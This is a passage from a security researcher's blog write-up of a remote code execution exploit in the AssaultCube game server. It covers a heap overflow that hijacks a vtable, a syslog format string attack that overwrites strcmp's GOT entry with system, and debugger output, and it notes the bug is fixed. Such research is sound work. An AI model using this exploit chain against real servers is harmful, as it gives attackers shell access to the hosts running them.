<span class="n">writedemo</span><span class="p">(</span><span class="n">chan</span><span class="p">,</span> <span class="n">packet</span><span class="o">-></span><span class="n">data</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">packet</span><span class="o">-></span><span class="n">dataLength</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>If you were paying attention,
you could’ve noticed that not only that we overwrite <code class="language-plaintext highlighter-rouge">demorecord</code>’s vtable,
the data that is passed to <code class="language-plaintext highlighter-rouge">writedemo</code> contains our text message.</p>
<p>Roughly,
<code class="language-plaintext highlighter-rouge">QUEUE_STR(text) -> cl.messages -> worldstate.messages -> writedemo(worldstate.messages) -> demorecord->write(worldstate.messages)</code></p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">writedemo</span><span class="p">(</span><span class="kt">int</span> <span class="n">chan</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">demorecord</span><span class="o">-></span><span class="n">write</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>So, we can both control the function that is called, and even choose an argument to pass it! Neato’.</p>
<p><code class="language-plaintext highlighter-rouge">demorecord</code> itself is <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L643">initialized</a> only once at the start of the game and is of <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/stream.cpp#L474">type</a> <code class="language-plaintext highlighter-rouge">gzstream : stream</code></p>
<p>Let’s rewind into the limitations for a second.
Because of the call to <code class="language-plaintext highlighter-rouge">filtertext</code> <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2833">here</a>, it is not possible to send a message with unprintable characters, and the size of the message is limited to 260 bytes.</p>
<p>This is pretty problematic because it drastically reduces the leverage of this attack, in effect, allowing us to only pass printable pointers.</p>
<p>In order to deal with that, I wrote a <a href="https://github.com/elongl/AC/blob/research/egk/get_possibly_called_funcs.py">script</a> that returns all the <strong>GOT</strong> functions whose pointers are completely printable. Note that I had to limit the search to GOT functions because I needed a memory address that holds a pointer to a function, exactly like the vtable behaves. That’s why I couldn’t just call functions within the executable itself. The script returned the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Function | Address in ASCII
malloc: p}D
_ZTVN10__cxxabiv120__si_class_type_infoE: H]D
strstr: `D
isxdigit: (`D
socket: 0`D
_ZSt9terminatev: 8`D
recvmsg: @`D
accept: H`D
strtoul: P`D
fwrite_unlocked: X`D
strchr: ``D
uncompress: h`D
__cxa_begin_catch: p`D
strspn: x`D
perror: aD
system: (aD // Well, hello there
inflateInit2_: 0aD
gmtime: 8aD
openlog: @aD
__cxa_atexit: HaD
time: PaD
strcpy: XaD
_ZdlPv: `aD
select: haD
__isoc99_sscanf: paD
closelog: xaD
gethostbyaddr_r: bD
vfprintf: (bD
fread_unlocked: 0bD
shutdown: 8bD
tmpfile: @bD
putchar: HbD
strcmp: PbD
strtol: XbD
inflateReset: `bD
fprintf: hbD
tolower: pbD
backtrace: xbD
strcat: cD
setsockopt: (cD
remove: 0cD
__cxa_guard_acquire: 8cD
sqrtf: @cD
toupper: HcD
frexp: PcD
inet_pton: XcD
__cxa_pure_virtual: `cD
qsort: hcD
fwrite: pcD
close: xcD
</code></pre></div></div>
<p>Hold on…Is the address of <code class="language-plaintext highlighter-rouge">system</code> completely printable?</p>
<p>Well, easy peasy, let’s just call <code class="language-plaintext highlighter-rouge">system</code> and our text message is already passed as an argument to the function, so that’s it, we can run commands on the server’s host, right? You guessed it, of course not.</p>
<p>Let’s take a moment to discuss how <em>methods</em> or <em>member functions</em>, are called in C++ in a very abstract way, after all, <code class="language-plaintext highlighter-rouge">write</code> is a virtual method of demorecord.</p>
<p>A method is a function like any other, with the small caveat that it needs to be able to reference the object’s members as well. The way that it’s being done is via an implicit <code class="language-plaintext highlighter-rouge">this</code> argument.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">class</span> <span class="nc">Foo</span>
<span class="p">{</span>
<span class="n">std</span><span class="o">::</span><span class="n">string</span> <span class="n">text</span> <span class="o">=</span> <span class="s">"bar"</span><span class="p">;</span>
<span class="nl">public:</span>
<span class="kt">void</span> <span class="n">print</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o"><<</span> <span class="n">text</span> <span class="o"><<</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Foo</span> <span class="n">foo</span><span class="p">;</span>
<span class="n">foo</span><span class="p">.</span><span class="n">print</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<p>If we were to debug this, we’d see that <code class="language-plaintext highlighter-rouge">foo.print()</code> actually loads <code class="language-plaintext highlighter-rouge">foo</code> into the first argument and jumps to <code class="language-plaintext highlighter-rouge">Foo::print</code>.</p>
<p>By the way, in Python it’s much more clear simply because it’s explicit, every method receives a <code class="language-plaintext highlighter-rouge">self</code> as its first parameter.</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">class</span> <span class="nc">Foo</span><span class="p">:</span>
<span class="k">def</span> <span class="nf">bar</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">pass</span>
</code></pre></div></div>
<p>Now that we’ve cleared this up, we can see why it won’t be possible to call <code class="language-plaintext highlighter-rouge">system</code> with our command, because <code class="language-plaintext highlighter-rouge">demorecord</code> <strong>itself</strong> is the first argument that is passed, upon this invocation — <code class="language-plaintext highlighter-rouge">demorecord->write(data, len);</code>
not data. Unfortunately.</p>
<p>But looking at the bright side, we can still call certain functions and control the second argument with printable characters. That has to be useful. Right?</p>
<p>After a lot of attempts, I couldn’t quite solve this puzzle so I returned to the code and looked towards different directions that would allow me to bypass the frustrating printable characters only limitation so that I’d be able to call much more functions, and also be able to pass pointers and what not as my arguments.</p>
<p>I revisited the <code class="language-plaintext highlighter-rouge">QUEUE</code> macros to look for different ways to write data to the <code class="language-plaintext highlighter-rouge">messages</code> vector, there were a lot of other places but they wrote a relatively small buffer, like my position which is about 3 integers, or a voice communication sound which is a single integer so that won’t trigger an overflow.</p>
<p>But then I realized that a client can send <strong>multiple events</strong> at a <strong>single process call</strong>!</p>
<p>So for instance, I’d be able to</p>
<ol>
<li>Change my name.</li>
<li>Update my location on the map.</li>
<li>Send a voice message.</li>
<li>Send a text message.</li>
</ol>
<p>And only <strong>then</strong> would process exit and all of these would be bundled into <code class="language-plaintext highlighter-rouge">worldstate.messages</code>. This is vital for the sake of writing binary data into <code class="language-plaintext highlighter-rouge">messages</code>.</p>
<p>I looked up all the places where <code class="language-plaintext highlighter-rouge">QUEUE_MSG</code> is being used, which is basically a macro that takes all the input read from the client up until the point its invoked, and adds it to <code class="language-plaintext highlighter-rouge">messages</code>.</p>
<p>Interestingly, one of the places it appears is in the <code class="language-plaintext highlighter-rouge">default</code> case of the client event handler which sort of behaves like a <em>flush</em> or emptying the buffer I’d say.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">default:</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">size</span> <span class="o">=</span> <span class="n">msgsizelookup</span><span class="p">(</span><span class="n">type</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">size</span> <span class="o"><=</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">sender</span> <span class="o">>=</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">disconnect_client</span><span class="p">(</span><span class="n">sender</span><span class="p">,</span> <span class="n">DISC_TAGT</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">loopi</span><span class="p">(</span><span class="n">size</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">);</span> <span class="c1">// Read integers from the client.</span>
<span class="n">QUEUE_MSG</span><span class="p">;</span> <span class="c1">// Queue them into messages.</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>This is great because our data doesn’t affect or break anything, literally all it does is to get written into <code class="language-plaintext highlighter-rouge">messages</code>. Now what’s left to do is get size to be as big as we want so that not too much data is read, nor too little.</p>
<p>The <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/protocol.cpp#L350">msgsizelookup</a> function returns the size that a certain event is supposed to read. If the event was supposed to be caught as a case in the event handler than <code class="language-plaintext highlighter-rouge">-1</code> is returned which would disconnect the client (can be seen above) since that shouldn’t truly happen.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="kt">int</span> <span class="n">msgsizes</span><span class="p">[]</span> <span class="o">=</span> <span class="c1">// size inclusive message token, 0 for variable or not-checked sizes</span>
<span class="p">{</span>
<span class="n">SV_SERVINFO</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="n">SV_WELCOME</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="n">SV_INITCLIENT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_POS</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_POSC</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_POSN</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_TEXT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_TEAMTEXT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_TEXTME</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_TEAMTEXTME</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_TEXTPRIVATE</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span>
<span class="n">SV_SHOOT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_EXPLODE</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_SUICIDE</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">SV_AKIMBO</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="n">SV_RELOAD</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">SV_AUTHT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_AUTHREQ</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_AUTHTRY</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_AUTHANS</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_AUTHCHAL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">...</span> <span class="o">-</span> <span class="mi">1</span><span class="p">};</span>
<span class="kt">int</span> <span class="nf">msgsizelookup</span><span class="p">(</span><span class="kt">int</span> <span class="n">msg</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">static</span> <span class="kt">int</span> <span class="n">sizetable</span><span class="p">[</span><span class="n">SV_NUM</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="o">-</span><span class="mi">1</span><span class="p">};</span>
<span class="k">if</span> <span class="p">(</span><span class="n">sizetable</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o"><</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">memset</span><span class="p">(</span><span class="n">sizetable</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sizetable</span><span class="p">));</span>
<span class="k">for</span> <span class="p">(</span><span class="k">const</span> <span class="kt">int</span> <span class="o">*</span><span class="n">p</span> <span class="o">=</span> <span class="n">msgsizes</span><span class="p">;</span> <span class="o">*</span><span class="n">p</span> <span class="o">>=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">p</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">)</span>
<span class="n">sizetable</span><span class="p">[</span><span class="n">p</span><span class="p">[</span><span class="mi">0</span><span class="p">]]</span> <span class="o">=</span> <span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">msg</span> <span class="o">>=</span> <span class="mi">0</span> <span class="o">&&</span> <span class="n">msg</span> <span class="o"><</span> <span class="n">SV_NUM</span> <span class="o">?</span> <span class="n">sizetable</span><span class="p">[</span><span class="n">msg</span><span class="p">]</span> <span class="o">:</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>I made a list of all the <a href="https://github.com/elongl/AC/blob/research/egk/events">events</a> that can be passed so that I won’t get disconnected (return -1), and also are bigger than 0. This is what I ended up with</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SV_SOUND (2), SV_THROWNADE (8), SV_GAMEMODE (2)
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">SV_SOUND</code> & <code class="language-plaintext highlighter-rouge">SV_GAMEMODE</code> are too small to write any pointer, though <code class="language-plaintext highlighter-rouge">SV_THROWNADE</code> is sufficient! You might be wondering, if you can call several events at the same cycle, what’s the problem with simply triggering <code class="language-plaintext highlighter-rouge">SV_SOUND</code> multiple times? Well, the thing is that the event type itself is also written into the <code class="language-plaintext highlighter-rouge">messages</code> buffer.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">type</span> <span class="o">=</span> <span class="n">checktype</span><span class="p">(</span><span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">),</span> <span class="n">cl</span><span class="p">);</span> <span class="c1">// Reading the event type.</span>
</code></pre></div></div>
<p>So that won’t fly because there will be “noise” in between.</p>
<p>Great! Now we can write 7 (size — 1) bytes in a row to <code class="language-plaintext highlighter-rouge">messages</code>, which in practice mean that we can call <strong>any</strong> imported function now.</p>
<p><img src="https://cdn-images-1.medium.com/max/2970/1*3PsOuKZfDRFeyDKxA6Ok7g.png" alt="A peek into the binary's imported functions." /><em>A peek into the binary’s imported functions.</em></p>
<p>After browsing for a while, looking for function to call within the program with the second argument in control, I noticed <strong>syslog</strong>.</p>
<p>From its signature, <code class="language-plaintext highlighter-rouge">void syslog(int priority, const char *format, ...);</code><br />
we can see that its second argument is a format string.
If we’d take a look at <code class="language-plaintext highlighter-rouge">man syslog(3)</code> we’d see:</p>
<blockquote>
<p>The remaining arguments are a format, as in printf(3),</p>
</blockquote>
<p>I assume most of you are familiar with format string attack, if not, give it a read <a href="http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf">here</a> or Google it.</p>
<p>This is awesome!
Can potentially be escalated into arbitrary write<em>-ish</em>.</p>
<p>I padded <code class="language-plaintext highlighter-rouge">messages</code> with <code class="language-plaintext highlighter-rouge">AAA...</code> until I reached the vtable’s memory,
at which point I sent the <code class="language-plaintext highlighter-rouge">SV_THROWNADE</code> and wrote <code class="language-plaintext highlighter-rouge">syslog</code>’s address, then I took a look at the stack to see what interesting pointers are there, and to which memory can I write.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg> b syslog if strstr(fmt, "hello")
pwndbg> stack 500
00:0000│ rsp 0x7ffc5044d418 —▸ 0x40fc22 (buildworldstate()+946) ◂— mov rdi, qword ptr [rip + 0x3fa77]
01:0008│ 0x7ffc5044d420 —▸ 0x1790c40 —▸ 0x1790a40 ◂— 0x2f02c1802f180058 /* 'X' */
02:0010│ 0x7ffc5044d428 ◂— 0x1b
03:0018│ 0x7ffc5044d430 —▸ 0x1790c58 —▸ 0x1790a40 ◂— 0x2f02c1802f180058 /* 'X' */
04:0020│ 0x7ffc5044d438 —▸ 0x1790c48 —▸ 0x178ed30 ◂— 0x50e031e7c2800004
05:0028│ 0x7ffc5044d440 —▸ 0x1790c54 ◂— 0x1790a400000000a /* '\n' */
06:0030│ 0x7ffc5044d448 —▸ 0x1790a40 ◂— 0x2f02c1802f180058 /* 'X' */
07:0038│ r10 0x7ffc5044d450 —▸ 0x17a63d0 ◂— 0x4af802f02c1802f
08:0040│ r9 0x7ffc5044d458 —▸ 0x1790c40 —▸ 0x1790a40 ◂— 0x2f02c1802f180058 /* 'X' */
09:0048│ rsi-4 0x7ffc5044d460 ◂— 0x553b00000000
0a:0050│ 0x7ffc5044d468 ◂— 0xa00000000
0b:0058│ 0x7ffc5044d470 —▸ 0x17a9070 —▸ 0x1791830 —▸ 0x1790f40 —▸ 0x17970d0 ◂— ...
0c:0060│ 0x7ffc5044d478 ◂— 0xa9
0d:0068│ 0x7ffc5044d480 —▸ 0x7ffc5044d4b0 ◂— 0x7f9800000003
0e:0070│ 0x7ffc5044d488 ◂— 0x1
0f:0078│ 0x7ffc5044d490 ◂— 0x5
10:0080│ 0x7ffc5044d498 —▸ 0x7ffc5044d4d0 ◂— '192.168.1.40'
...
</code></pre></div></div>
<p>Unfortunately, on the stack itself there wasn’t any buffer that I can control.<br />
This is where I had to get creative.</p>
<p>While there isn’t any buffer that I can write to on the stack at that moment of the execution, there are a lot of pointers on the stack to other locations on the <strong>stack</strong> itself. What I decided to do is, using those pointers, write an address to somewhere on the stack using that pointer, and then write to that value by referencing the stack memory itself.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Goal: Write VAL into ADDR.
// Stack
A -> B
B -> C
1. Write ADDR onto the stack using A.
A -> B
B -> ADDR <- ????
2. Write VAL into ADDR using B.
A -> B
B -> ADDR <- VAL
</code></pre></div></div>
<p>Frankly, this turned out to be easier than I thought.<br />
It’s important to mention that there’s a certain limitation to how much padding you can do using a format string attack, so I couldn’t use that for a <em>full</em> arbitrary write but I could definitely write to the executable’s memory space.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg> vmmap
// Integers that big can't be written.
0x7febe5a3e000 0x7febe5a63000 r--p 25000 0 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7febe5a63000 0x7febe5bdb000 r-xp 178000 25000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7febe5bdb000 0x7febe5c25000 r--p 4a000 19d000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7febe5c25000 0x7febe5c26000 ---p 1000 1e7000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7febe5c26000 0x7febe5c29000 r--p 3000 1e7000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
// Those definitely can!
0x400000 0x403000 r--p 3000 0 AC/bin_unix/native_server
0x403000 0x437000 r-xp 34000 3000 AC/bin_unix/native_server
0x437000 0x444000 r--p d000 37000 AC/bin_unix/native_server
0x445000 0x446000 r--p 1000 44000 AC/bin_unix/native_server
0x446000 0x448000 rw-p 2000 45000 AC/bin_unix/native_server
</code></pre></div></div>
<p>Amazing.<br />
Now we have arbitrary write to the executable’s memory space.<br />
What do we write and to where?</p>
<p>I went to the <code class="language-plaintext highlighter-rouge">.got.plt</code> section, and searched for functions that I can pass a buffer to as the first argument so that it’ll be properly set for</p>
<p><code class="language-plaintext highlighter-rouge">int system (const char *command)</code></p>
<p>I went to the event handler of the text messages, <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2829">SV_TEXT</a>, and saw which libc functions are being used, and more specifically, those whose first argument is the text message itself.</p>
<p>It needed to be accurate enough so that it doesn’t affect / break the rest of the server’s logic and cause it to crash, so preferably not a function that gets called every second or something.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="n">SV_TEXTME</span><span class="p">:</span>
<span class="k">case</span> <span class="n">SV_TEXT</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">mid1</span> <span class="o">=</span> <span class="n">curmsg</span><span class="p">,</span> <span class="n">mid2</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">length</span><span class="p">();</span>
<span class="n">getstring</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>
<span class="n">filtertext</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">text</span><span class="p">);</span>
<span class="n">trimtrailingwhitespace</span><span class="p">(</span><span class="n">text</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="n">text</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">canspeech</span> <span class="o">=</span> <span class="n">forbiddenlist</span><span class="p">.</span><span class="n">canspeech</span><span class="p">(</span><span class="n">text</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">spamdetect</span><span class="p">(</span><span class="n">cl</span><span class="p">,</span> <span class="n">text</span><span class="p">)</span> <span class="o">&&</span> <span class="n">canspeech</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
</code></pre></div></div>
<p>At <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L1283">spamdetect</a>, there’s a call to <code class="language-plaintext highlighter-rouge">strcmp</code> that checks if the message that is being processed is equivalent to the message that was last sent, obviously to avoid spamming.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if(text[0] && !strcmp(text, cl->lastsaytext) && servmillis - cl->lastsay < SPAMREPEATINTERVAL*1000)
</code></pre></div></div>
<p>This is the perfect fit.</p>
<p>Using the format string attack, I <a href="https://github.com/elongl/AC/blob/research/source/src/client.cpp#L279">wrote</a> <code class="language-plaintext highlighter-rouge">system@plt</code> into <code class="language-plaintext highlighter-rouge">strcmp@got</code> so that whenever strcmp is called, it’ll actually jump to system.</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">In</span> <span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="n">p</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">'strcmp'</span><span class="p">]</span>
<span class="n">Out</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="mi">4481672</span> <span class="p">(</span><span class="mh">0x446288</span><span class="p">)</span>
<span class="n">In</span> <span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="n">p</span><span class="p">.</span><span class="n">plt</span><span class="p">[</span><span class="s">'system'</span><span class="p">]</span>
<span class="n">Out</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="mi">4207312</span> <span class="p">(</span><span class="mh">0x4032d0</span><span class="p">)</span>
</code></pre></div></div>
<p>Now, when I send a text message, it is passed through <code class="language-plaintext highlighter-rouge">spamdetect</code>, and the call to <code class="language-plaintext highlighter-rouge">strcmp</code> would in fact run the text message as a shell command.</p>
<p>How cool is that?!</p>
<p>Let’s take a look.</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/ncjvUTq5dco" frameborder="0" allowfullscreen=""></iframe></center>
<h3 id="steps">Steps</h3>
<p>A. Overflow <code class="language-plaintext highlighter-rouge">messages</code> into <code class="language-plaintext highlighter-rouge">demorecord</code> and overwrite the vtable to <code class="language-plaintext highlighter-rouge">syslog</code>.<br />
B. Place <code class="language-plaintext highlighter-rouge">strcmp@got</code> on the stack using the format string attack.<br />
C. Write <code class="language-plaintext highlighter-rouge">system@plt</code> into the <code class="language-plaintext highlighter-rouge">strcmp@got</code> using the format string attack.<br />
D. Run the command that pops a calculator by simply sending a text message.</p>
<p>You might be wondering why the hell am I launching another client.<br />
Well, that’s a legitimate question.</p>
<p>The reason is right here.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">empty</span><span class="p">())</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">();</span>
<span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">SV_CLIENT</span><span class="p">);</span>
<span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">clientnum</span><span class="p">);</span> <span class="c1">// c.clientnum == 0</span>
<span class="n">putuint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">());</span>
<span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">put</span><span class="p">(</span><span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">getbuf</span><span class="p">(),</span> <span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">());</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msglen</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">()</span> <span class="o">-</span> <span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">setsize</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Because I’m the first client to connect to the server,
my index at the <code class="language-plaintext highlighter-rouge">clients</code> vector, as well as my <code class="language-plaintext highlighter-rouge">clientnum</code> is <code class="language-plaintext highlighter-rouge">0</code>.
This becomes a problem when your buffer is a null-terminated string.</p>
<p>In the format attack which we discussed earlier,
we’re sending the format as a text message that is appended to the <code class="language-plaintext highlighter-rouge">worldstate</code>, that is later passed to <code class="language-plaintext highlighter-rouge">syslog</code>.
I’m forced to send the formats <strong>not</strong> from the first client because the string will terminate after the first character (<code class="language-plaintext highlighter-rouge">SV_CLIENT</code>).</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">SV_CLIENT</span><span class="p">);</span>
<span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">clientnum</span><span class="p">);</span> <span class="c1">// clientnum is 0.</span>
<span class="c1">// syslog's format would be - "{SV_CLIENT}\x00".</span>
</code></pre></div></div>
<h2 id="summary">Summary</h2>
<p>Let’s review the exploit.</p>
<ol>
<li>
<p>Using the initial vulnerability, overwrite the <code class="language-plaintext highlighter-rouge">alen</code> (capacity) of the <code class="language-plaintext highlighter-rouge">messages</code> vector into a bigger value that it can actually hold.</p>
</li>
<li>
<p>Overwriting the vtable by overflowing the heap into <code class="language-plaintext highlighter-rouge">demorecord</code> so that <code class="language-plaintext highlighter-rouge">demorecord->write</code> calls <code class="language-plaintext highlighter-rouge">syslog</code>.</p>
</li>
<li>
<p>Connect with another client, and exploit the <code class="language-plaintext highlighter-rouge">syslog</code>’s format to write the address of <code class="language-plaintext highlighter-rouge">strcmp@got</code> to the stack, and then write <code class="language-plaintext highlighter-rouge">system@plt</code> to it.</p>
</li>
<li>
<p>Run a shell command by simply sending a text message.</p>
</li>
</ol>
<h2 id="conclusion">Conclusion</h2>
<p>This game is definitely still being played, not that you’d start playing it today, but there are still some old-schoolers around.</p>
<p><img src="https://cdn-images-1.medium.com/max/2600/1*ZypJYHnnMMs0jTYum_LHcw.png" alt="Server Browser (can also scroll for more)" /><em>Server Browser (can also scroll for more)</em></p>
<p>I find it fascinating that from the developers’ point of view, the <strong>only</strong> vulnerability that I’ve exploited is:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="n">nextprimary</span> <span class="o"><</span> <span class="mi">0</span> <span class="o">&&</span> <span class="n">nextprimary</span> <span class="o">>=</span> <span class="n">NUMGUNS</span><span class="p">)</span> <span class="c1">// This should've been an OR operator, not an AND.</span>
</code></pre></div></div>
<p>They literally got confused <strong>once</strong>, a single incorrect operator, and we have code execution.</p>
<p>The rest is pure creativity.</p>
<p>I can only say that this has been a more teaching experience that all the CTFs I’ve done <strong>combined</strong>. They did give me a good sense of ideas on how to approach problems, but I’m glad I took a turn into that.</p>
<p>Needless to say, there was struggle and <em>a lot</em> of research in between that I did not elaborate about that eventually wasn’t utilized. The whole process wasn’t as effortless as it is being presented in this article and there are a lot of smaller details that I simply hid out because they’re just not interesting.</p>
<p>Since people have been asking, <strong>the bug had already been fixed.</strong><br />
